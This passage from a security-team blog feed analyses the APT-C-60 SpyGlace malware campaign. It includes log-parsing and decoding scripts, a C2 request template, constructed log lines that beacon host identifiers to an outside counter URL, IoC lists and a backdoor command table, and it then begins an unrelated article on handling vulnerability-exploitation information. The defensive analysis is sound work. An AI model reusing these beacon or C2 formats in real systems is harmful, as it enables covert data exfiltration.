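TASK_FILE_RE = re.compile(
    r"raw\.githubusercontent\.com/[^/]+/[^/]+/+refs/heads/main/(?P<hostid>[A-Za-z0-9_-]+)\.txt")


def flag_beacons(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (indicator, host identifier) for every line matching either pattern."""
    hits = []
    for line in log_lines:
        m = BEACON_REFERER_RE.search(line)
        if m and "statcounter.com" in line:
            hits.append(("statcounter beacon", m.group("hostid")))
            continue
        m = TASK_FILE_RE.search(line)
        if m:
            hits.append(("github task file", m.group("hostid")))
    return hits


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call both encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_payload(data: bytes, key: bytes = DOWNLOADER1_KEY) -> Tuple[bytes, bool]:
    """Decode a retrieved file and report whether it now starts with a PE 'MZ' header."""
    plain = xor_with_key(data, key)
    return plain, plain[:2] == b"MZ"


def api_name_encode(name: bytes) -> bytes:
    """The scheme in the order the article states it: add 0x04, then XOR 0x05."""
    return bytes(((b + 0x04) & 0xFF) ^ 0x05 for b in name)


def api_name_decode(enc: bytes) -> bytes:
    """Inverse of api_name_encode: XOR 0x05, then subtract 0x04."""
    return bytes(((b ^ 0x05) - 0x04) & 0xFF for b in enc)


# Constructed proxy log lines in combined-log format.
SAMPLE_LOG = [
    '10.0.0.7 - - [01/Jul/2025:10:00:01 +0900] "GET https://c.statcounter.com/13139439/0/1ba1a548/1/ HTTP/1.1" 200 43 '
    '"ONLINE=>3,12 >> C:\\Users\\user / 1A2B3C4DDESKTOP-TEST" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jul/2025:10:00:02 +0900] "GET https://raw.githubusercontent.com/carolab989/class2025/refs/heads/main/'
    '1A2B3C4DDESKTOP-TEST.txt HTTP/1.1" 404 9 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jul/2025:10:00:05 +0900] "GET https://www.example.com/index.html HTTP/1.1" 200 1024 '
    '"https://www.example.com/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for indicator, hostid in flag_beacons(SAMPLE_LOG):
        print(f"{indicator}: host id {hostid}")
    sample = xor_with_key(b"MZ\x90\x00constructed-sample", DOWNLOADER1_KEY)
    print(decode_payload(sample))
    print(api_name_decode(api_name_encode(b"LoadLibraryW")))
```

Two practical notes: the 404 on the task-file request is the normal state for a host the attacker has not yet "activated" (the file only exists after the operator reacts to the beacon), so repeated 404s for a <code>.txt</code> under <code>refs/heads/main/</code> are themselves the signal; and the host identifier recovered from either pattern can be cross-checked against Appendix F.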
<p>SpyGlace uses BASE64 and RC4 for communication with its C2 server; the format of the request in the initial communication is shown below. The userid string <strong>"GOLDBAR"</strong> used for the a001 value is identical to the string reported by Positive Technologies<a href="#2">[2]</a> and the one used in last year's attacks in Japan, and may denote the target region or campaign. As for the encoding scheme, SpyGlace from at least Version 3.1.6 onward uses a modified <strong>RC4</strong>.</p>
<pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
a001=[md5("GOLDBAR")]&a002=[md5(systeminfo)]&a003=["uid" or "info"]&a004=[BASE64(CustomRC4([ComputerName;UserName;CpuInfo;OS Version;SpyGlace Version]))]
</pre>
<p>The modified RC4 differs from standard RC4 in that the KSA is run for additional rounds and an extra value is added to the keystream byte that is XORed; it can be decoded with the Python script below.</p>
<pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
import base64


def CustomRC4(key: bytes, data: bytes) -> bytes:
    # --- KSA ---
    # Standard RC4 runs the key-scheduling loop once; this variant runs it n times.
    S = list(range(256))
    n = 3
    for _round in range(n):
        j = 0
        keylen = len(key)
        if keylen == 0:
            raise ValueError("key must be non-empty")
        for i in range(256):
            j = (j + S[i] + key[i % keylen]) & 0xFF
            S[i], S[j] = S[j], S[i]
    # --- PRGA ---
    i = j = 0
    out = []
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        k = S[(S[i] + j) & 0xFF]
        S[i], S[j] = S[j], S[i]
        # Second keystream byte derived from additional S-box lookups; both are XORed in.
        k2 = S[((S[((i >> 3) ^ (0x20 * j)) & 0xFF] + S[((0x20 * i) ^ (j >> 3)) & 0xFF]) ^ 0xAA) & 0xFF] + S[(S[j] + S[i]) & 0xFF]
        out.append((b ^ k ^ k2) & 0xFF)
    return bytes(out)


def decode(base64in):
    key = b"90b149c69b149c4b99c04d1dc9b940b9"
    decoded = CustomRC4(key, base64.b64decode(base64in))
    print("Result: ", decoded)
    return decoded
</pre>
<h3>Decoy documents used</h3>
<p>Figure 3 shows part of a decoy document used in this attack. Because recruiting staff are the target, the fabricated resume presents a career as a researcher and lists several papers, but the sender's name does not appear among the authors of those papers. The name on the resume roughly matches the Gmail account name of the email sender, suggesting the attacker created the account specifically for this attack.</p>
<p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/aptc60update03-800wri.png" width="800" height="1034" alt="" class="asset asset-image at-xid-3905242 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p>
<div style="text-align: center;"> Figure 3: Part of a decoy document used in the attack </div>
<h3>Analysis of the GitHub repositories</h3>
<p>Because the attacker uses GitHub to distribute payloads, all previously distributed payloads can be retrieved as long as the repository is not deleted. Table 2 shows the SpyGlace versions that were uploaded and the date and time each was uploaded.</p>
<div style="text-align: center;"> Table 2: Date and time each version was uploaded to GitHub </div>
<table>
<thead> <tr> <th>SpyGlace Version</th> <th>Upload Date &amp; Time</th> </tr> </thead>
<tbody>
<tr> <td>Version 3.1.12</td> <td>Fri Jun 27 14:33:28 2025 +0900</td> </tr>
<tr> <td>Version 3.1.13</td> <td>Thu Jul 3 18:25:18 2025 +0900</td> </tr>
<tr> <td>Version 3.1.14</td> <td>Wed Jul 16 15:03:52 2025 +0900</td> </tr>
</tbody>
</table>
<p>We also confirmed the email addresses recorded in the commit log of the attacker-controlled GitHub repository, as well as infected host information consisting of <strong>volume serial numbers</strong> and <strong>computer names</strong>. This information is provided for reference in Appendix E and Appendix F respectively.</p>
<h2>Closing</h2>
<p>Consistent with past trends, APT-C-60's attacks are concentrated on East Asia, including Japan. Although changes such as the move of infrastructure from Bitbucket to GitHub and updates to the malware can be seen, much remains the same, including the use of legitimate services and the malware's behavior, so continued vigilance in light of these trends is needed. The network destinations and hashes of the observed malware are listed in the Appendix. Note that the destinations include legitimate services.</p>
<p style="text-align: right">Incident Response Group: 増渕 維摩</p>
<h4>References</h4>
<p><a name="1"></a>[1] Sangfor, [Advanced Threat Tracking (APT)] In-depth analysis of the encrypted payloads in the "Pseudo Hunter" group's GitHub repositories <a href="https://mp.weixin.qq.com/s/A1UhFfqnGRLsEZywvaQA4A" target="_blank"><br>https://mp.weixin.qq.com/s/A1UhFfqnGRLsEZywvaQA4A</a></p>
<p><a name="2"></a>[2] Positive Technologies, DarkHotel. A cluster of groups united by common techniques <a href="https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques/" target="_blank"><br>https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques/</a></p>
<h4>Appendix A: IoC Network</h4>
<ul>
<li>https[:]//c.statcounter[.]com/13139439/0/1ba1a548/1/</li>
<li>https[:]//raw.githubusercontent[.]com/carolab989/class2025//refs/heads/main/</li>
<li>https[:]//raw.githubusercontent[.]com/football2025/class2025//refs/heads/main/</li>
<li>https[:]//raw.githubusercontent[.]com/fenchiuwu/class2025/refs/heads/main/</li>
<li>http[:]//raw.githubusercontent[.]com/Ridgley22387/r834829jf/refs/heads/main/datapages.txt</li>
<li>http[:]//raw.githubusercontent[.]com/Ridgley22387/r834829jf/refs/heads/main/datautils.txt</li>
<li>https[:]//bitbucket[.]org/clouds999/glo29839/downloads/</li>
<li>https[:]//raw.githubusercontent[.]com/goldbars33/ozbdkak33/refs/heads/main/</li>
<li>https[:]//185.181.230[.]71/wkdo9/4b3ru.asp</li>
<li>https[:]//185.181.230[.]71/wkdo9/t1802.asp</li>
<li>https[:]//185.181.230[.]71/wkdo9/n3tb4.asp</li>
<li>https[:]//185.181.230[.]71/wkdo9/2qpmk.asp</li>
</ul>
<h4>Appendix B: IoC File</h4>
<div style="text-align: center;"> Table 3: File list </div>
<table style="table-layout: fixed; width: 100%;"> <colgroup> <col style="width: 20%;"> <col style="width: 20%;"> <col style="width: 60%;"> </colgroup> <thead> <tr> <th>Content</th> <th>Filename</th> <th>Hash(SHA256)</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious VHDX</td> <td style="word-wrap: break-word; white-space: normal;">CV &amp; Professional Experience.vhdx</td> <td style="word-wrap: break-word; white-space: normal;">f42d0fa77e5101f0f793e055cb963b45b36536b1835b9ea8864b4283b21bb68f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious LNK</td> <td style="word-wrap: 
break-word; white-space: normal;">Resume.rtf.lnk</td> <td style="word-wrap: break-word; white-space: normal;">25f81709d914a0981716e1afba6b8b5b3163602037d466a02bc1ec97cdc2063b</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">wic60.ds</td> <td style="word-wrap: break-word; white-space: normal;">ea37dfa94a63689c1195566aab3d626794adaab4d040d473d4dfbd36f1e5f237</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">wic400.ds</td> <td style="word-wrap: break-word; white-space: normal;">a80848cf7d42e444b7ec1161c479b1d51167893f47d202b05f590ad24bf47942</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">wic900.ds</td> <td style="word-wrap: break-word; white-space: normal;">1e931c8aa00b7f2b3adedc5260a3b69d1ac914fe1c022db072ed45d7b2dddf6c</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Dropper Script</td> <td style="word-wrap: break-word; white-space: normal;">glog.txt</td> <td style="word-wrap: break-word; white-space: normal;">c9c6960a5e6f44afda4cc01ff192d84d59c4b31f304d2aeba0ef01ae04ca7df3</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">WebClassUser.dat</td> <td style="word-wrap: break-word; white-space: normal;">f102d490ad02b1588b9b76664cd715c315eaab33ac22b5d0812c092676242b15</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">DownLoader2</td> <td style="word-wrap: break-word; white-space: normal;">WebCacheR.tmp.dat</td> <td style="word-wrap: break-word; white-space: normal;">57a77d8d21ef6a3458763293dbe3130dae2615a5de75cbbdf17bc61785ee79da</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">DownLoader2</td> <td 
style="word-wrap: break-word; white-space: normal;">WebCacheR.tmp.dat</td> <td style="word-wrap: break-word; white-space: normal;">9e30df1844300032931e569b256f1a8a906a46c6a7efa960d95142d6bea05941</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">git.exe(Legitimate)</td> <td style="word-wrap: break-word; white-space: normal;">gcmd.exe</td> <td style="word-wrap: break-word; white-space: normal;">96312254d33241ce276afc7d7e0c7da648ffe33f3b91b6e4a1810f0086df3dba</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace version 1.3.12</td> <td style="word-wrap: break-word; white-space: normal;">datautils.txt</td> <td style="word-wrap: break-word; white-space: normal;">669c268e4e1ced22113e5561a7d414a76fcd247189ed87a8f89fbbd61520966a</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace version 1.3.13</td> <td style="word-wrap: break-word; white-space: normal;">datautils.txt</td> <td style="word-wrap: break-word; white-space: normal;">f96557e8d714aa9bac8c3f112294bac28ebc81ea52775c4b8604352bbb8986b8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace version 1.3.14</td> <td style="word-wrap: break-word; white-space: normal;">datautils.txt</td> <td style="word-wrap: break-word; white-space: normal;">8b51939700c65f3cb7ccdc5ef63dba6ca5953ab5d3c255ce3ceb657e7f5bfae8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace Loader</td> <td style="word-wrap: break-word; white-space: normal;">datapages.txt</td> <td style="word-wrap: break-word; white-space: normal;">d535837fe4e5302f73b781173346fc9031d60019ea65a0e1e92e20e399a2f387</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace Loader</td> <td style="word-wrap: break-word; white-space: normal;">datapages.txt</td> <td style="word-wrap: break-word; white-space: normal;">6d8a935f11665850c45f53dc1a3fc0b4ac9629211bd4281a4ec4343f8fa02004</td> </tr> <tr> <td style="word-wrap: 
break-word; white-space: normal;">Downloader2</td> <td style="word-wrap: break-word; white-space: normal;">coninst3110.dat</td> <td style="word-wrap: break-word; white-space: normal;">d287dc5264fd504b016ec7e424650e2b353946cbf14d3b285ca37d78a6fda6f4</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader</td> <td style="word-wrap: break-word; white-space: normal;">constart3110.dat</td> <td style="word-wrap: break-word; white-space: normal;">10278a46b13797269fd79a5f8f0bc14ff1cc5bc0ea87cdd1bbc8670c464a3cf1</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">ingredient.txt</td> <td style="word-wrap: break-word; white-space: normal;">156df8c8bea005bd7dc49eb7aca230ef85ada1c092e45bb3d69913d78c4fa1f9</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader Script</td> <td style="word-wrap: break-word; white-space: normal;">UsrClass.sct</td> <td style="word-wrap: break-word; white-space: normal;">7ae86f2cb0bbe344b3102d22ecfcdda889608e103e69ec92932b437674ad5d2f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader Script</td> <td style="word-wrap: break-word; white-space: normal;">UsrClass.sct</td> <td style="word-wrap: break-word; white-space: normal;">e8b3b14a998ce3640a985b4559c90c31a5d7465bc5be5c6962e487172d3c9094</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader</td> <td style="word-wrap: break-word; white-space: normal;">intersection.txt</td> <td style="word-wrap: break-word; white-space: normal;">09fcc1dfe973a4dc91582d7a23265c0fd8fc2a011adb2528887c1e1d3a89075a</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader</td> <td style="word-wrap: break-word; white-space: normal;">opinsfile.dat</td> <td style="word-wrap: break-word; white-space: normal;">048b69386410b8b7ddb7835721de0cba5945ee026a9134d425e0ba0662d9aee4</td> </tr> <tr> <td style="word-wrap: 
break-word; white-space: normal;">Loader</td> <td style="word-wrap: break-word; white-space: normal;">constafile.dat</td> <td style="word-wrap: break-word; white-space: normal;">f495171e7a10fb0b45d28a5260782a8c1f7080bd1173af405476e8d3b11b21b6</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader</td> <td style="word-wrap: break-word; white-space: normal;">coninsfile.dat</td> <td style="word-wrap: break-word; white-space: normal;">8ea32792c1624a928e60334b715d11262ed2975fe921c5de7f4fac89f8bb2de5</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious VHDX</td> <td style="word-wrap: break-word; white-space: normal;">CV &amp; Professional Experience.vhdx</td> <td style="word-wrap: break-word; white-space: normal;">94ccdaf238a42fcc3af9ed1cae1358c05c04a8fa77011331d75825c8ac16ffd8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Dropper Script</td> <td style="word-wrap: break-word; white-space: normal;">volumelog.txt</td> <td style="word-wrap: break-word; white-space: normal;">299d792c8d0d38d13af68a2467186b2f47a1834c6f2041666adafc626149edaf</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">vol60.dot</td> <td style="word-wrap: break-word; white-space: normal;">ea37dfa94a63689c1195566aab3d626794adaab4d040d473d4dfbd36f1e5f237</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">vol400.dot</td> <td style="word-wrap: break-word; white-space: normal;">94f6406a0f40fb8d84ceafaf831f20482700ee1a92f6bca1f769dff98896245c</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">vol900.dot</td> <td style="word-wrap: break-word; white-space: 
45c1c7">
normal;">45c1c79064cef01b85f0a62dac368e870e8ac3023bfbb772ec6d226993dc0f87</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">UsrClassCache.dat</td> <td style="word-wrap: break-word; white-space: normal;">50b40556aa7461566661d6a8b9486e5829680951b5df5b7584e0ab58f8a7e92f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious LNK</td> <td style="word-wrap: break-word; white-space: normal;">Resume.rtf.lnk</td> <td style="word-wrap: break-word; white-space: normal;">5da82fa87b0073de56f2b20169fa4d6ea610ed9c079def6990f4878d020c9d95</td> </tr> </tbody> </table> <h4>Appendix C: Other IoCs</h4> <div style="text-align: center;"> Table 4: Other IoCs </div> <table> <thead> <tr> <th>Content</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>Mutex</td> <td>K31610KIO9834PG79A90B</td> </tr> <tr> <td>Mutex</td> <td>K31610KIO9834PG79AD7B</td> </tr> <tr> <td>Mutex</td> <td>K31610KIO9834PG79A44A</td> </tr> <tr> <td>CLASSID</td> <td>{566296fe-e0e8-475f-ba9c-a31ad31620b1}</td> </tr> <tr> <td>CLASSID</td> <td>{64B8F404-A4AE-11D1-B7B6-00C04FB926AF}</td> </tr> <tr> <td>File path</td> <td>%userprofile%\AppData\Local\Microsoft\Windows\WebClassUser.dat</td> </tr> <tr> <td>File path</td> <td>%localappdata%\Microsoft\Windows\WebCache\WebCacheR.tmp.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%\appdata\local\Microsoft\GameDVR\data\GameList.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%\appdata\local\Microsoft\GameDVR\data\DataCache.dat</td> </tr> <tr> <td>File path</td> <td>%temp%\wcts66889.tmp</td> </tr> <tr> <td>File path</td> <td>%localappdata%\Microsoft\Windows\UsrClassCache.dat</td> </tr> <tr> <td>File path</td> <td>%localappdata%\Microsoft\Windows\UsrClassLib.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%\appdata\local\Microsoft\Edge\cache\Config.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%\appdata\Local\Microsoft\Windows\UsrClassCache.dat</td> 
</tr> <tr> <td>File path</td> <td>%userprofile%\appdata\local\Microsoft\Edge\cache\Cache.dat</td> </tr> </tbody> </table> <h4>Appendix D: Commands</h4> <div style="text-align: center;"> Table 5: List of SpyGlace commands </div> <table> <thead> <tr> <th>Command</th> <th>Contents</th> </tr> </thead> <tbody> <tr> <td>turn on</td> <td>Change the interval settings</td> </tr> <tr> <td>turn off</td> <td>Reset the interval settings</td> </tr> <tr> <td>cd</td> <td>Change directory</td> </tr> <tr> <td>ddir</td> <td>List the files in the directory</td> </tr> <tr> <td>ddel</td> <td>Delete file and directory</td> </tr> <tr> <td>ld</td> <td>Load module</td> </tr> <tr> <td>uld</td> <td>Unload module</td> </tr> <tr> <td>attach</td> <td>Start module</td> </tr> <tr> <td>detach</td> <td>Stop module</td> </tr> <tr> <td>procspawn</td> <td>Start process</td> </tr> <tr> <td>prockill</td> <td>None</td> </tr> <tr> <td>proclist</td> <td>None</td> </tr> <tr> <td>diskinfo</td> <td>Get disk information</td> </tr> <tr> <td>download</td> <td>Download encrypted file</td> </tr> <tr> <td>downfree</td> <td>Download file</td> </tr> <tr> <td>cancel</td> <td>Remote shell</td> </tr> <tr> <td>screenupload</td> <td>Upload screenshot</td> </tr> <tr> <td>screenauto</td> <td>Upload screenshot automatically</td> </tr> <tr> <td>upload</td> <td>Upload file</td> </tr> </tbody> </table> <h4>Appendix E: Email addresses used for the commits</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> kithatart@outlook.com magnolia099@163.com carolab989@proton.me fenchiuwu@proton.me Ridgley223870@proton.me </pre> <h4>Appendix F: Victimized devices identified from the GitHub repository</h4>
  42. Commentary: Operation of the Vulnerability-Related Information Handling Framework and Future Challenges (Part 2) ~ Handling Vulnerability Exploitation Information and Future Challenges ~

    Fri, 19 Sep 2025 02:30:00 -0000

    Introduction In Part 1 of this article, we explained the "Information Security Early Warning Partnership"[1] framework...
<h4>Introduction</h4> <p>In Part 1 of this article, we explained so-called "coordinated vulnerability disclosure (CVD)" under the "Information Security Early Warning Partnership"<a href="#fn1">[1]</a> framework and introduced the activities carried out in normal times. In Part 2, we would like to introduce the response operations carried out when a vulnerability is already being exploited, or when the likelihood of exploitation is rising. Information on vulnerability exploitation, and in particular information on zero-day attacks before public disclosure, is not something many organizations have experience handling. In addition to coordinating and publishing many vulnerabilities throughout the year, JPCERT/CC handles exploitation information (distribution of threat information in parallel with vulnerability coordination, security alerts, dissemination through information-sharing activities, collaboration with overseas organizations, and so on). After explaining these little-known operations, we would also like to briefly consider the points at issue for improving the framework going forward.</p> <p><br>&lt;Notes for reading this article&gt;<br>・Unless otherwise specified, the "product in which the vulnerability was found" in this article is basically assumed to be an enterprise product. Please note that the corresponding discussion of consumer products has been omitted for reasons of space.<br>・For general points to note on handling vulnerability exploitation information, please see the "Guidance on Sharing and Publishing Information Related to Cyber Attack Damage" and the "Guide to Handling and Utilizing Attack Technique Information".<br>・Because this article also covers cases outside the domestic framework, we use the generally used terms maker/vendor rather than the "product developer" of the vulnerability public notice (告示).</p> <h4>&nbsp;</h4> <h4>Decision Factors When Handling Vulnerability Exploitation Information</h4> <hr> <p>When an attack campaign exploiting an unknown vulnerability comes to light, the decision factors in handling the exploitation information (coordination, information sharing, publication, etc.) are as shown in the figure below.</p> <p><strong>Amount/accuracy of information:</strong><br>There are very few cases in which it can be immediately confirmed at the affected site that "an unknown vulnerability was exploited"; this is confirmed after investigation on the affected side and verification (over a period of time) on the vendor side.<br>If the information the vendor was able to obtain from affected sites before vulnerability coordination and publication was limited, new information about the vulnerability may be found in the investigation results from affected sites discovered after the vulnerability publication or security alert, and in some cases this leads to the additional publication of another vulnerability or an additional fix.</p> <p><strong>Investigation on the affected side/verification on the vendor side:</strong><br>Accurately identifying the exploited vulnerability requires not only investigation on the affected side but also verification on the vendor side. This point is discussed later.</p> <p><strong>Preparing countermeasures/contacting customers:</strong><br>On the vendor side, preparations proceed for identifying and verifying the vulnerability, preparing countermeasures, contacting customers, publication, and so on.<br>If an attack is ongoing and serious damage is spreading, depending on the situation the information may be disclosed (publication or contacting customers) without waiting for a fix, with interim workarounds, damage-mitigation measures for compromised systems, or a hotfix being provided.</p> <p><strong>Publication/security alerts/information sharing:</strong><br>For an explanation of the general decision factors for issuing security alerts, please refer to the following previously published article.</p> <p style="padding-left: 40px;">JPCERT/CC Eyes: On the problem of the recipient-side "cost" of security alerts and information-sharing activities: so that information dissemination does not become a self-serving act done as an alibi or for the sake of results<br>https://blogs.jpcert.or.jp/ja/2023/05/cost-and-effectiveness-of-alerts.html</p> <p>Indicator information for detecting compromise, such as the malware and communication destinations used in attacks exploiting the vulnerability, is in some cases published together with the security alert and in other cases disseminated through non-public information-sharing activities; the means of delivery, their combination, and the timing vary. As in the case of overseas products described later, there are cases where the number of users is so large that indicator information is published along with the security alert, and there are cases where the vendor or a specialist organization contacts users individually and conveys it non-publicly.</p> <p></p> <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E6%83%85%E5%A0%B1%E3%83%8F%E3%83%B3%E3%83%89%E3%83%AA%E3%83%B3%E3%82%B0%E3%81%AE%E5%90%84%E5%88%A4%E6%96%AD%E8%A6%81%E7%B4%A0%E3%81%A8%E5%90%84%E7%B5%84%E7%B9%94%E3%81%AE%E3%82%A2%E3%82%AF.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881478 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E6%83%85%E5%A0%B1%E3%83%8F%E3%83%B3%E3%83%89%E3%83%AA%E3%83%B3%E3%82%B0%E3%81%AE%E5%90%84%E5%88%A4%E6%96%AD%E8%A6%81%E7%B4%A0%E3%81%A8%E5%90%84%E7%B5%84%E7%B9%94%E3%81%AE%E3%82%A2%E3%82%AF-640wri.png" alt="" width="640" height="351"></a> <figcaption>Figure 1: Decision factors in handling vulnerability exploitation information / actions of each organization</figcaption> </figure> <p></p> <h4>&nbsp;</h4> <h4>Explanation of the Various Patterns of Vulnerability Exploitation</h4> <hr> <p>Very simply put, vulnerability exploitation incidents can be classified into the patterns below. For example, there have been almost no cases of a zero-day in a domestic product with global impact, so this article omits that discussion and explains the cases JPCERT/CC frequently handles: Case A (zero-day incident in a domestic product), Case B (zero-day incident in an overseas product), and Case C (N-day incident in an overseas product).</p> <table style="border-collapse: collapse; width: 100%; height: 179.2px;" border="1"><colgroup><col style="width: 25.022%;"><col style="width: 21.6857%;"><col style="width: 28.3582%;"><col style="width: 24.9342%;"></colgroup> <tbody> <tr> <td>Domestic or overseas product</td> <td>Zero-day or N-day attack</td> <td>Scope of impact: domestic, mainly overseas, or global (including Japan)</td> <td><strong>&nbsp;</strong></td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;" rowspan="4">Domestic product</td> <td style="height: 22.4px;" rowspan="2">Zero-day</td> <td style="height: 22.4px;">Impact basically domestic</td> <td style="height: 22.4px;"><strong>Explained in Case A</strong></td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;">Global impact</td> <td style="height: 22.4px;">(※almost no cases)</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;" rowspan="2">N-day</td> <td style="height: 22.4px;">Impact basically domestic</td> <td>Not covered in this article for reasons of space</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;">Global impact</td> <td>(※almost no cases)</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;" rowspan="4">Overseas product</td> <td style="height: 22.4px;" rowspan="2">Zero-day</td> <td style="height: 22.4px;">Almost no domestic impact</td> <td style="height: 22.4px;">-<br>(※no security alerts or other information dissemination issued)</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;">Global impact</td> <td style="height: 22.4px;"><strong>Explained in Case B</strong></td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;" rowspan="2">N-day</td> <td style="height: 22.4px;">Almost no domestic impact</td> <td style="height: 22.4px;">-<br>(※no security alerts or other information dissemination issued)</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;">Global impact</td> <td style="height: 22.4px;"><strong>Explained in Case C</strong></td> </tr> </tbody> </table> <p></p> <h5>&lt;Case A: Zero-day incident in a domestic product&gt;</h5> <p>In the case of a domestic product, upon receiving a report or consultation from the discoverer, the affected organization, or the product developer, the vulnerability is identified, the product developer prepares a fix, and coordination toward publication takes place. As explained in Part 1, in Japan, JPCERT/CC, designated as the coordinating body under the "Information Security Early Warning Partnership", coordinates with the product developer. If exploitation damage has already occurred in Japan, coordination is carried out together with incident response support and information-sharing activities, and the cause (the exploited vulnerability) is identified based on information from the affected sites. Multiple parties, namely the affected organization, the organization conducting the investigation, JPCERT/CC, and the product developer, work together to coordinate the vulnerability publication and a security alert about the exploitation.</p> <p></p> <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E5%9B%BD%E5%86%85%E8%A3%BD%E5%93%81%E6%82%AA%E7%94%A8%E6%99%82%E3%81%AE%E5%AF%BE%E5%BF%9C.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881658 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E5%9B%BD%E5%86%85%E8%A3%BD%E5%93%81%E6%82%AA%E7%94%A8%E6%99%82%E3%81%AE%E5%AF%BE%E5%BF%9C-640wri.png" alt="" width="640" height="431"></a> <figcaption>Figure 2: Response when a domestic product is exploited</figcaption> </figure> <p></p> 
<p><strong>〇Mediation, coordination, and verification between the affected-side investigation and the vendor-side investigation</strong><br>In Part 1 we touched on the problem of miscommunication caused by the asymmetry of knowledge between vulnerability discoverers and product developers; the same problem exists in responding to exploitation incidents. For example, there are cases where the product developer, lacking knowledge and information about the attack, cannot accurately understand the possible existence of a vulnerability and the way to fix it as pointed out by the affected side from its investigation results, and the fix ends up being insufficient. Also, because the affected side is often subject to restrictions on handling information, such as NDAs related to the investigation and reporting to government agencies, there is a risk that sufficient information is not provided to the product developer and that identification, verification, and remediation of the vulnerability end up incomplete.<br>Conversely, there are cases where the investigators on the affected side lack knowledge and information about the product in question and misidentify (or incompletely identify) the vulnerability or where it occurs. In such cases, JPCERT/CC, which is both a coordinating body and an incident response organization, mediates and coordinates toward an appropriate fix for the vulnerability.</p> <p>In addition, when the affected sites that have been recognized and investigated up to that point are limited, or when the attacker has erased traces or the vulnerability/attack is one that leaves very few traces, it may be necessary to disseminate and query indicator information other than the vulnerability information itself through information-sharing activities, find other sites affected by the same actor, and supplement the missing artifacts/information.<br>Furthermore, it is necessary to check whether the same actor is exploiting 